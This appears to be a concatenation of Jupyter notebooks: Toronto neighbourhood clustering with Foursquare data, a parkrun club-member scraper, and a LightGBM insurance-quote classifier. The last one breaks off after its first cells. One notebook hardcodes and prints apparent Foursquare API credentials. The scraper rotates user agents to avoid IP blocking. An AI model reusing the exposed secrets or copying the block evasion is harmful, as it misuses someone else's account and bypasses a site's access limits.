"In this project we explore, segment, and cluster the neighborhoods in the city of Toronto. Since the data is not available in the Internet on a simple presentation, we have to scrape a Wikipedia page wrangle the data, clean it, and then read it into a structured format.",
"_____no_output_____"
]
],
[
[
"import numpy as np # library to handle data in a vectorized manner\n\nimport pandas as pd # library for data analsysis\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\nimport json # library to handle JSON files\n\n#!conda install -c conda-forge geopy --yes # uncomment this line if you haven't completed the Foursquare API lab\nfrom geopy.geocoders import Nominatim # convert an address into latitude and longitude values\n\nimport requests # library to handle requests\nfrom pandas.io.json import json_normalize # tranform JSON file into a pandas dataframe\n\n# Matplotlib and associated plotting modules\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\n\n# import k-means from clustering stage\nfrom sklearn.cluster import KMeans\n\nimport folium # map rendering library\n\n\n\n",
"_____no_output_____"
]
],
[
[
"### Scraping the Data\n\nUse the Notebook to build the code to scrape the following Wikipedia page, https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M, in order to obtain the data that is in the table of postal codes and to transform the data into a pandas dataframe like the one shown below:",
"_____no_output_____"
]
],
[
[
"toronto='https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M'",
"_____no_output_____"
],
[
"df = pd.read_html(toronto, header=0)[0]",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
]
],
[
[
"### Eliminating cells with a borough that is Not assigned\n\nOnly process the cells that have an assigned borough. Ignore cells with a borough that is Not assigned.",
"_____no_output_____"
]
],
[
[
"df.drop(df[df['Borough']==\"Not assigned\"].index,axis=0, inplace=True)",
"_____no_output_____"
]
],
[
[
"### Grouping by Postal Code\n\nMore than one neighborhood can exist in one postal code area. For example, in the table on the Wikipedia page, you will notice that M5A is listed twice and has two neighborhoods: Harbourfront and Regent Park. These two rows will be combined into one row with the neighborhoods separated with a comma as shown in row 11 in the above table.",
"_____no_output_____"
]
],
[
[
"df1=df.groupby('Postcode')['Neighbourhood'].agg(lambda x: ','.join(x)) \ndf3=pd.DataFrame(df1)\ndf3.reset_index().head()",
"_____no_output_____"
],
[
"df2=df.groupby('Postcode')['Borough'].unique()\ndf4=pd.DataFrame(df2)\ndf4.reset_index().head()\n\ndf4['Borough']=[df4['Borough'][i][0] for i in range(df4.shape[0])]\ndf4.reset_index().head()",
"_____no_output_____"
],
[
"df4['Neighbourhood']=df3['Neighbourhood']",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
],
[
"df4.loc[df4['Neighbourhood']==\"Not assigned\",'Neighbourhood']=df4.loc[df4['Neighbourhood']==\"Not assigned\",'Borough']\n",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
],
[
"df4.shape",
"_____no_output_____"
]
],
[
[
"### Including the Latitude and Longitude to the Dataframe\n\nNow in order to utilize the Foursquare location data, we need to get the latitude and the longitude coordinates of each neighborhood.",
"_____no_output_____"
]
],
[
[
"coords=r'http://cocl.us/Geospatial_data'",
"_____no_output_____"
],
[
"coord_df=pd.read_csv(coords)",
"_____no_output_____"
],
[
"df4['Latitude']=coord_df['Latitude'].values\ndf4['Longitude']=coord_df['Longitude'].values",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
]
],
[
[
"### Explore and cluster the neighborhoods in Toronto.",
"_____no_output_____"
]
],
[
[
"import folium\n\nCLIENT_ID = 'IVUX2ATVRIVIAT3MYAOI3BNB0N5X2BCPEGK3W0FCX5RNN1HN' # my Foursquare ID\nCLIENT_SECRET = '1UKWCBE54WZK50IHDYJXAK3GJCXPGQELW5QE30LXCGRA4MG2' # my Foursquare Secret\nVERSION = '20180605' # Foursquare API version\n\nprint('Your credentails:')\nprint('CLIENT_ID: ' + CLIENT_ID)\nprint('CLIENT_SECRET:' + CLIENT_SECRET)",
"Your credentails:\nCLIENT_ID: IVUX2ATVRIVIAT3MYAOI3BNB0N5X2BCPEGK3W0FCX5RNN1HN\nCLIENT_SECRET:1UKWCBE54WZK50IHDYJXAK3GJCXPGQELW5QE30LXCGRA4MG2\n"
],
[
"def getNearbyVenues(names, latitudes, longitudes, radius=500):\n \n venues_list=[]\n for name, lat, lng in zip(names, latitudes, longitudes):\n print(name)\n \n # create the API request URL\n url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format(\n CLIENT_ID, \n CLIENT_SECRET, \n VERSION, \n lat, \n lng, \n radius, \n LIMIT)\n \n # make the GET request\n results = requests.get(url).json()[\"response\"]['groups'][0]['items']\n \n # return only relevant information for each nearby venue\n venues_list.append([(\n name, \n lat, \n lng, \n v['venue']['name'], \n v['venue']['location']['lat'], \n v['venue']['location']['lng'], \n v['venue']['categories'][0]['name']) for v in results])\n\n nearby_venues = pd.DataFrame([item for venue_list in venues_list for item in venue_list])\n nearby_venues.columns = ['Neighbourhood', \n 'Neighbourhood Latitude', \n 'Neighbourhood Longitude', \n 'Venue', \n 'Venue Latitude', \n 'Venue Longitude', \n 'Venue Category']\n \n return(nearby_venues)",
"_____no_output_____"
],
[
"LIMIT=100\ntoronto_venues = getNearbyVenues(names=df4['Neighbourhood'],\n latitudes=df4['Latitude'],\n longitudes=df4['Longitude']\n )",
"Rouge,Malvern\nHighland Creek,Rouge Hill,Port Union\nGuildwood,Morningside,West Hill\nWoburn\nCedarbrae\nScarborough Village\nEast Birchmount Park,Ionview,Kennedy Park\nClairlea,Golden Mile,Oakridge\nCliffcrest,Cliffside,Scarborough Village West\nBirch Cliff,Cliffside West\nDorset Park,Scarborough Town Centre,Wexford Heights\nMaryvale,Wexford\nAgincourt\nClarks Corners,Sullivan,Tam O'Shanter\nAgincourt North,L'Amoreaux East,Milliken,Steeles East\nL'Amoreaux West\nUpper Rouge\nHillcrest Village\nFairview,Henry Farm,Oriole\nBayview Village\nSilver Hills,York Mills\nNewtonbrook,Willowdale\nWillowdale South\nYork Mills West\nWillowdale West\nParkwoods\nDon Mills North\nFlemingdon Park,Don Mills South\nBathurst Manor,Downsview North,Wilson Heights\nNorthwood Park,York University\nCFB Toronto,Downsview East\nDownsview West\nDownsview Central\nDownsview Northwest\nVictoria Village\nWoodbine Gardens,Parkview Hill\nWoodbine Heights\nThe Beaches\nLeaside\nThorncliffe Park\nEast Toronto\nThe Danforth West,Riverdale\nThe Beaches West,India Bazaar\nStudio District\nLawrence Park\nDavisville North\nNorth Toronto West\nDavisville\nMoore Park,Summerhill East\nDeer Park,Forest Hill SE,Rathnelly,South Hill,Summerhill West\nRosedale\nCabbagetown,St. James Town\nChurch and Wellesley\nHarbourfront,Regent Park\nRyerson,Garden District\nSt. James Town\nBerczy Park\nCentral Bay Street\nAdelaide,King,Richmond\nHarbourfront East,Toronto Islands,Union Station\nDesign Exchange,Toronto Dominion Centre\nCommerce Court,Victoria Hotel\nBedford Park,Lawrence Manor East\nRoselawn\nForest Hill North,Forest Hill West\nThe Annex,North Midtown,Yorkville\nHarbord,University of Toronto\nChinatown,Grange Park,Kensington Market\nCN Tower,Bathurst Quay,Island airport,Harbourfront West,King and Spadina,Railway Lands,South Niagara\nStn A PO Boxes 25 The Esplanade\nFirst Canadian Place,Underground city\nLawrence Heights,Lawrence Manor\nGlencairn\nHumewood-Cedarvale\nCaledonia-Fairbanks\nChristie\nDovercourt Village,Dufferin\nLittle Portugal,Trinity\nBrockton,Exhibition Place,Parkdale Village\nDownsview,North Park,Upwood Park\nDel Ray,Keelesdale,Mount Dennis,Silverthorn\nThe Junction North,Runnymede\nHigh Park,The Junction South\nParkdale,Roncesvalles\nRunnymede,Swansea\nQueen's Park\nCanada Post Gateway Processing Centre\nBusiness Reply Mail Processing Centre 969 Eastern\nHumber Bay Shores,Mimico South,New Toronto\nAlderwood,Long Branch\nThe Kingsway,Montgomery Road,Old Mill North\nHumber Bay,King's Mill Park,Kingsway Park South East,Mimico NE,Old Mill South,The Queensway East,Royal York South East,Sunnylea\nKingsway Park South West,Mimico NW,The Queensway West,Royal York South West,South of Bloor\nIslington Avenue\nCloverdale,Islington,Martin Grove,Princess Gardens,West Deane Park\nBloordale Gardens,Eringate,Markland Wood,Old Burnhamthorpe\nHumber Summit\nEmery,Humberlea\nWeston\nWestmount\nKingsview Village,Martin Grove Gardens,Richview Gardens,St. Phillips\nAlbion Gardens,Beaumond Heights,Humbergate,Jamestown,Mount Olive,Silverstone,South Steeles,Thistletown\nNorthwest\n"
],
[
"toronto_venues.groupby('Neighbourhood').count().head()",
"_____no_output_____"
],
[
"print('There are {} uniques categories.'.format(len(toronto_venues['Venue Category'].unique())))",
"There are 272 uniques categories.\n"
]
],
[
[
"#### Encoding the variables",
"_____no_output_____"
]
],
[
[
"# one hot encoding\ntoronto_onehot = pd.get_dummies(toronto_venues[['Venue Category']], prefix=\"\", prefix_sep=\"\")\n\n# add neighborhood column back to dataframe\ntoronto_onehot['Neighbourhood'] = toronto_venues['Neighbourhood'] \n\n# move neighborhood column to the first column\nfixed_columns = [toronto_onehot.columns[-1]] + list(toronto_onehot.columns[:-1])\ntoronto_onehot = toronto_onehot[fixed_columns]\ntoronto_grouped = toronto_onehot.groupby('Neighbourhood').mean().reset_index()",
"_____no_output_____"
],
[
"num_top_venues = 5\n\nfor hood in toronto_grouped['Neighbourhood']:\n #print(\"----\"+hood+\"----\")\n temp = toronto_grouped[toronto_grouped['Neighbourhood'] == hood].T.reset_index()\n temp.columns = ['venue','freq']\n temp = temp.iloc[1:]\n temp['freq'] = temp['freq'].astype(float)\n temp = temp.round({'freq': 2})\n #print(\n temp.sort_values('freq', ascending=False).reset_index(drop=True).head(num_top_venues)\n # print('\\n')",
"_____no_output_____"
],
[
"def return_most_common_venues(row, num_top_venues):\n row_categories = row.iloc[1:]\n row_categories_sorted = row_categories.sort_values(ascending=False)\n \n return row_categories_sorted.index.values[0:num_top_venues]",
"_____no_output_____"
],
[
"num_top_venues = 10\n\nindicators = ['st', 'nd', 'rd']\n\n# create columns according to number of top venues\ncolumns = ['Neighbourhood']\nfor ind in np.arange(num_top_venues):\n try:\n columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind]))\n except:\n columns.append('{}th Most Common Venue'.format(ind+1))\n\n# create a new dataframe\nneighborhoods_venues_sorted = pd.DataFrame(columns=columns)\nneighborhoods_venues_sorted['Neighbourhood'] = toronto_grouped['Neighbourhood']\n\nfor ind in np.arange(toronto_grouped.shape[0]):\n neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(toronto_grouped.iloc[ind, :], num_top_venues)\n\nneighborhoods_venues_sorted.head()",
"_____no_output_____"
]
],
[
[
"### K Clusters",
"_____no_output_____"
]
],
[
[
"# set number of clusters\nkclusters = 7\n\ntoronto_grouped_clustering = toronto_grouped.drop('Neighbourhood', 1)\n\n# run k-means clustering\nkmeans = KMeans(n_clusters=kclusters, random_state=0).fit(toronto_grouped_clustering)\n\n# check cluster labels generated for each row in the dataframe\nkmeans.labels_[0:10] ",
"_____no_output_____"
],
[
"# add clustering labels\nneighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_)\n\ntoronto_merged = df4\n\n# merge toronto_grouped with toronto_data to add latitude/longitude for each neighborhood\ntoronto_merged = toronto_merged.join(neighborhoods_venues_sorted.set_index('Neighbourhood'), on='Neighbourhood')\n",
"_____no_output_____"
],
[
"toronto_merged.reset_index()",
"_____no_output_____"
],
[
"toronto_merged.dropna(inplace=True)",
"_____no_output_____"
],
[
"# create map\naddress='Toronto'\ngeolocator = Nominatim(user_agent=\"toronto_explorer\")\nlocation = geolocator.geocode(address)\nlatitude = location.latitude\nlongitude = location.longitude\nmap_clusters = folium.Map(location=[latitude, longitude], zoom_start=11)\n\n# set color scheme for the clusters\nx = np.arange(kclusters)\nys = [i + x + (i*x)**2 for i in range(kclusters)]\ncolors_array = cm.rainbow(np.linspace(0, 1, len(ys)))\nrainbow = [colors.rgb2hex(i) for i in colors_array]\n\n# add markers to the map\nmarkers_colors = []\nfor lat, lon, poi, cluster in zip(toronto_merged['Latitude'], toronto_merged['Longitude'], toronto_merged['Neighbourhood'], toronto_merged['Cluster Labels']):\n label = folium.Popup(str(poi) + ' Cluster ' + str(cluster), parse_html=True)\n folium.CircleMarker(\n [lat, lon],\n radius=5,\n popup=label,\n color=rainbow[int(cluster)-1],\n fill=True,\n fill_color=rainbow[int(cluster)-1],\n fill_opacity=0.7).add_to(map_clusters)\n \nmap_clusters",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb00c2cddd6874686ef98994d46c8f97985d95a3 | 29,553 | ipynb | Jupyter Notebook | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | 36.216912 | 232 | 0.448922 | [
[
[
"<a href=\"https://colab.research.google.com/github/vol1ura/parkrun_analysis/blob/master/clubmates.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport random\nimport re\nimport requests\nimport time\nfrom tqdm.notebook import tqdm\n\npd.set_option('display.max_rows', None)",
"_____no_output_____"
],
[
"%pip install random_user_agent",
"Collecting random_user_agent\n Downloading random_user_agent-1.0.1-py3-none-any.whl (8.2 MB)\n\u001b[K |████████████████████████████████| 8.2 MB 7.0 MB/s \n\u001b[?25hInstalling collected packages: random-user-agent\nSuccessfully installed random-user-agent-1.0.1\n"
],
[
"from random_user_agent.user_agent import UserAgent\n\nuser_agent_rotator = UserAgent()",
"_____no_output_____"
],
[
"club_id = 23212 # Wake&Run\nhome_parkrun = 'Kuzminki'",
"_____no_output_____"
],
[
"headers = {\n 'Host': 'www.parkrun.ru',\n 'User-Agent': user_agent_rotator.get_random_user_agent(),\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-GPC': '1',\n 'TE': 'Trailers'\n}",
"_____no_output_____"
],
[
"page_all_results = requests.get('https://www.parkrun.ru/results/courserecords/', headers=headers)\ndata = pd.read_html(page_all_results.text)[0]\nrussian_parkruns = data[data.columns[0]]",
"_____no_output_____"
],
[
"dfs = []\nfor parkrun in tqdm(russian_parkruns):\n time.sleep(3 + 5*random.random())\n parkrun_trim = re.sub(r'[\\s-]', '', parkrun)\n url = f'https://www.parkrun.ru/{parkrun_trim}/results/clubhistory/?clubNum={club_id}'\n headers['User-Agent'] = user_agent_rotator.get_random_user_agent()\n club_results = requests.get(url, headers=headers)\n try:\n df = pd.read_html(club_results.text)[0]\n dfs.append(df[df.columns[0]])\n if parkrun == home_parkrun:\n home_list = df[df.columns[0]]\n except:\n print('ОШИБКА - операция завершилась досрочно. Паркран временно заблокировал IP.')\n break",
"_____no_output_____"
],
[
"def last_name_first(full_name: str):\n names = full_name.split()\n last_name = names.pop(1).capitalize()\n names.insert(0, last_name)\n return ' '.join(names)",
"_____no_output_____"
],
[
"full_list = pd.concat(dfs).drop_duplicates(keep='last')\nouter_home_list = pd.concat([full_list, home_list]).apply(last_name_first).sort_values().drop_duplicates(keep=False).reset_index(drop=True)",
"_____no_output_____"
]
],
[
[
"### Одноклубники, не бегавшие на домашнем паркране:",
"_____no_output_____"
]
],
[
[
"outer_home_list.shift(1, fill_value='________Фамилия_Имя___')",
"_____no_output_____"
]
],
[
[
"### Полный список одноклубников:",
"_____no_output_____"
]
],
[
[
"full_list.apply(last_name_first).sort_values().reset_index(drop=True).shift(1, fill_value='________Фамилия_Имя___')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb00c3e83636471c0f7c44b7c652f4f878a6071c | 1,008 | ipynb | Jupyter Notebook | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | 24.585366 | 242 | 0.52877 | [
[
[
"<a href=\"https://colab.research.google.com/github/bavincen/notebooks/blob/main/tensorflow_ml_model_example.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb00cf7271c06e85150df444f463271d3da2f675 | 184,405 | ipynb | Jupyter Notebook | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | 181.500984 | 30,276 | 0.886766 | [
[
[
"import numpy as np \nimport pandas as pd \nimport os\nimport gc\nimport seaborn as sns # for plotting graphs\nimport matplotlib.pyplot as plt # for plotting graphs aswell\nimport glob\nfrom datetime import datetime\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss,roc_auc_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom scipy.sparse import coo_matrix, hstack\nimport lightgbm\nfrom lightgbm import LGBMClassifier\nfrom sklearn.model_selection import KFold\n%matplotlib inline\n",
"_____no_output_____"
],
[
"# to display maximum rows and columns\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\n",
"_____no_output_____"
],
[
"# function to set all numerical data to int16 or float16, to save on memory use\ndef dtype_conver(Dataframe):\n for col in Dataframe:\n if Dataframe[col].dtype in ['float32','float64']:\n Dataframe[col] = Dataframe[col].astype(np.float16)\n if Dataframe[col].dtype in ['int32','float64']:\n Dataframe[col] = Dataframe[col].astype(np.int16)",
"_____no_output_____"
],
[
"#Parameters for lightGBM classification\nmodel_lgb = LGBMClassifier(\n n_jobs=4,\n n_estimators=100000,\n boost_from_average='false',\n learning_rate=0.02,\n num_leaves=64,\n num_threads=4,\n max_depth=7,\n tree_learner = \"serial\",\n feature_fraction = 0.7,\n bagging_freq = 5,\n bagging_fraction = 0.5,\n# min_data_in_leaf = 75,\n# min_sum_hessian_in_leaf = 50.0,\n silent=-1,\n verbose=-1,\n device='cpu',\n )",
"_____no_output_____"
],
[
"#Parameters for RFC classification\nclf = RandomForestClassifier(n_estimators=1000, max_depth=7,random_state=0,max_leaf_nodes=64,verbose=1,n_jobs=-1)",
"_____no_output_____"
],
[
"# import OneHotEncoder & define it\nfrom sklearn.preprocessing import OneHotEncoder\nohe = OneHotEncoder(categories = 'auto',sparse=True)",
"_____no_output_____"
],
[
"kf = KFold(n_splits=5, random_state=10, shuffle=True)",
"_____no_output_____"
],
[
"\ndef master_pipe(X_ohe,y):\n\n # place holder for k-fold scores\n scores = []\n\n # to differentiate files names produced by plt.savefig\n n = 1\n\n # model pipeline calculates model score and saves feature importance graph as .png file\n for i,(tr_idx, val_idx) in enumerate(kf.split(X_ohe,y)):\n print('Fold :{}'.format(i))\n tr_X = X_ohe[tr_idx] # training for this loop\n tr_y = y[tr_idx] #\n val_X = X_ohe[val_idx]# validation data for this loop\n val_y = y[val_idx]\n # here build your models\n model = model_lgb\n model.fit(tr_X, tr_y, eval_set=[(tr_X, tr_y), (val_X, val_y)], eval_metric = 'auc', verbose=100, \n early_stopping_rounds= 50)\n #picking best model?\n pred_val_y = model.predict_proba(val_X,num_iteration=model.best_iteration_)[:,1]\n #measuring model vs validation\n score = roc_auc_score(val_y,pred_val_y)\n scores.append(score)\n print('current performance by auc:{}'.format(score))\n lightgbm.plot_importance(model, ax=None, height=0.2, xlim=None, ylim=None, title='Feature importance', \n xlabel='Feature importance', ylabel='Features', importance_type='split',\n max_num_features=20, ignore_zero=True, figsize=None, grid=True, precision=3)\n # in python plots dir will be auto-created\n #plt.show()\n plt.savefig('..(in jupyter, point destination here and remove plots dir ->)plots/feature_importance{}.png'.format(n))\n plt.close()\n n=n+1",
"_____no_output_____"
],
[
"def master_pipe_RFC(X_ohe,y):\n # place holder for k-fold scores\n scores_rfc = []\n\n # model pipeline calculates model score and saves feature importance graph as .png file\n for i,(tr_idx, val_idx) in enumerate(kf.split(X_ohe,y)):\n print('Fold :{}'.format(i))\n tr_X = X_ohe[tr_idx] # training for this loop\n tr_y = y[tr_idx] #\n val_X = X_ohe[val_idx]# validation data for this loop\n val_y = y[val_idx]\n # here build your models\n model = clf\n model.fit(tr_X, tr_y)\n #picking best model?\n pred_val_y = model.predict(val_X)\n #measuring model vs validation\n score_rfc = roc_auc_score(val_y,pred_val_y)\n scores_rfc.append(score_rfc)\n print('current performance by auc:{}'.format(score_rfc))\n ",
"_____no_output_____"
],
[
"# Read in filepath \nDATA_PATH = r'C:/Users/t891199/Desktop/Big_Data_Diploma/CEBD_1260_Machine_learning/Data Files/Class_3/'\nfile_name = os.path.join(DATA_PATH,'train.csv')\n",
"_____no_output_____"
],
[
"# pandas reads in csv file using filepath\nold_train_df = pd.read_csv(file_name)\nprint(old_train_df.shape)\n#original_quote_date is time-series",
"(260753, 299)\n"
],
[
"#Feature Engineering\nold_train_df['Original_Quote_Date'] = pd.to_datetime(old_train_df['Original_Quote_Date'])\nold_train_df['year'] = old_train_df['Original_Quote_Date'].dt.year\nold_train_df['month'] = old_train_df['Original_Quote_Date'].dt.month\nold_train_df['day'] = old_train_df['Original_Quote_Date'].dt.day\ntrain_df = old_train_df.drop([\"Original_Quote_Date\"], axis = 1)",
"_____no_output_____"
],
[
"# lets see how many NaN or Null values are in each column\nnan_info = pd.DataFrame(train_df.isnull().sum()).reset_index()\nnan_info.columns = ['col','nan_cnt']\n",
"_____no_output_____"
],
[
"#sort them in descending order and print 1st 10\nnan_info.sort_values(by = 'nan_cnt',ascending=False,inplace=True)\nnan_info.head(10)",
"_____no_output_____"
],
[
"# extract column names with NaNs and Nulls\n# in numerical cols\nnum_cols_with_missing = ['PersonalField84','PropertyField29']\n\n",
"_____no_output_____"
],
[
"# extract column names with NaNs and Nulls\n# in boolean type cols\nbool_cols_with_missing = ['PropertyField3','PropertyField4','PersonalField7','PropertyField32',\n 'PropertyField34','PropertyField36','PropertyField38']\n",
"_____no_output_____"
],
[
"# fill in null and NaN values with 'U' in boolean type cols ( 'Y','N')\nfor cols in bool_cols_with_missing:\n train_df[cols].fillna('U',inplace=True)\n\n",
"_____no_output_____"
],
[
"# fill in null and NaN values with -1 in numerical missing values\nfor cols in num_cols_with_missing:\n train_df[cols].fillna(-1, inplace=True)\n",
"_____no_output_____"
],
[
"# define target\ny = old_train_df[\"QuoteConversion_Flag\"].values",
"_____no_output_____"
],
[
"# drop target column from data\n# and static columns GeographicField10A & PropertyField6\nX = train_df.drop([\"QuoteConversion_Flag\",\"GeographicField10A\",\"PropertyField6\"], axis = 1)\n",
"_____no_output_____"
],
[
"#QuoteNumber setting as index\nX = X.set_index(\"QuoteNumber\")",
"_____no_output_____"
],
[
"dtype_conver(X)",
"_____no_output_____"
],
[
"# select all columns that are categorical i.e with unique categories less than 40 in our case\nX_for_ohe = [cols for cols in X.columns if X[cols].nunique() < 40 or X[cols].dtype in['object']]\nX_not_ohe = [cols for cols in X.columns if X[cols].nunique() > 40 and X[cols].dtype not in['object']]\n",
"_____no_output_____"
],
[
"#numerical column that we will not encode\nX[X_not_ohe].head()\n",
"_____no_output_____"
],
[
"#to keep track of our columns, how many are remaining after we removed 4 so far?\nlen(X_for_ohe)",
"_____no_output_____"
],
[
"X['SalesField8'].head()",
"_____no_output_____"
],
[
"nan_info = pd.DataFrame(X[X_for_ohe].isnull().sum()).reset_index()\nnan_info.columns = ['col','nan_cnt']",
"_____no_output_____"
],
[
"#sort them in descending order and print 1st 10\nnan_info.sort_values(by = 'nan_cnt',ascending=False,inplace=True)\nnan_info.head(10)",
"_____no_output_____"
],
[
"# apply OneHotEncoder on categorical feature columns\nX_ohe = ohe.fit_transform(X[X_for_ohe])\n",
"_____no_output_____"
],
[
"# we are pretty much done for now here, apparently we can set 'sparse = True' in OneHotEncoder and we get a \n#csr_matrix. I left it as false so that you can see the sparse matrix\nX_ohe\n",
"_____no_output_____"
],
[
"# SalesField8 was kept out of sparse matrix, now we need to bring it back\n# scaledown SalesField8 for easy handling using log(), then convert to float16\nSF8 = np.log(X['SalesField8']).astype(np.float16)\nhstack((X_ohe,np.array(SF8)[:,None]))",
"_____no_output_____"
],
[
"# lets get the model k-fold scores for RFC\nmaster_pipe_RFC(X_ohe,y)",
"Fold :0\n"
],
[
"# lets get the model k-fold scores and print feature importance graphs\nmaster_pipe(X_ohe,y)\n",
"Fold :0\nTraining until validation scores don't improve for 50 rounds\n[100]\ttraining's auc: 0.956316\ttraining's binary_logloss: 0.237383\tvalid_1's auc: 0.954839\tvalid_1's binary_logloss: 0.236975\n[200]\ttraining's auc: 0.960422\ttraining's binary_logloss: 0.190373\tvalid_1's auc: 0.958327\tvalid_1's binary_logloss: 0.191157\n[300]\ttraining's auc: 0.963752\ttraining's binary_logloss: 0.178257\tvalid_1's auc: 0.960374\tvalid_1's binary_logloss: 0.181383\n[400]\ttraining's auc: 0.966979\ttraining's binary_logloss: 0.170736\tvalid_1's auc: 0.961703\tvalid_1's binary_logloss: 0.17723\n[500]\ttraining's auc: 0.969755\ttraining's binary_logloss: 0.164646\tvalid_1's auc: 0.962475\tvalid_1's binary_logloss: 0.174834\n[600]\ttraining's auc: 0.972186\ttraining's binary_logloss: 0.159703\tvalid_1's auc: 0.963093\tvalid_1's binary_logloss: 0.173345\n[700]\ttraining's auc: 0.974324\ttraining's binary_logloss: 0.155456\tvalid_1's auc: 0.963332\tvalid_1's binary_logloss: 0.172668\n[800]\ttraining's auc: 0.97621\ttraining's binary_logloss: 0.151465\tvalid_1's auc: 0.96358\tvalid_1's binary_logloss: 0.171897\n[900]\ttraining's auc: 0.977943\ttraining's binary_logloss: 0.147589\tvalid_1's auc: 0.963791\tvalid_1's binary_logloss: 0.171234\n[1000]\ttraining's auc: 0.979447\ttraining's binary_logloss: 0.144307\tvalid_1's auc: 0.963923\tvalid_1's binary_logloss: 0.170845\n[1100]\ttraining's auc: 0.98094\ttraining's binary_logloss: 0.140879\tvalid_1's auc: 0.964069\tvalid_1's binary_logloss: 0.170391\n[1200]\ttraining's auc: 0.982274\ttraining's binary_logloss: 0.137752\tvalid_1's auc: 0.964191\tvalid_1's binary_logloss: 0.170092\n[1300]\ttraining's auc: 0.983545\ttraining's binary_logloss: 0.134781\tvalid_1's auc: 0.964252\tvalid_1's binary_logloss: 0.169933\nEarly stopping, best iteration is:\n[1265]\ttraining's auc: 0.98315\ttraining's binary_logloss: 0.135754\tvalid_1's auc: 0.96426\tvalid_1's binary_logloss: 0.169942\ncurrent performance by auc:0.9642597680554159\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00d624ca30478d61a4f4d58505fbb1a3761a1f | 29,611 | ipynb | Jupyter Notebook | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | 29,611 | 29,611 | 0.656986 | [
[
[
"#!pip install datadotworld\n#!pip install datadotworld[pandas]",
"_____no_output_____"
],
[
"#!dw configure",
"_____no_output_____"
],
[
"from google.colab import drive\nimport datadotworld as dw\n\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
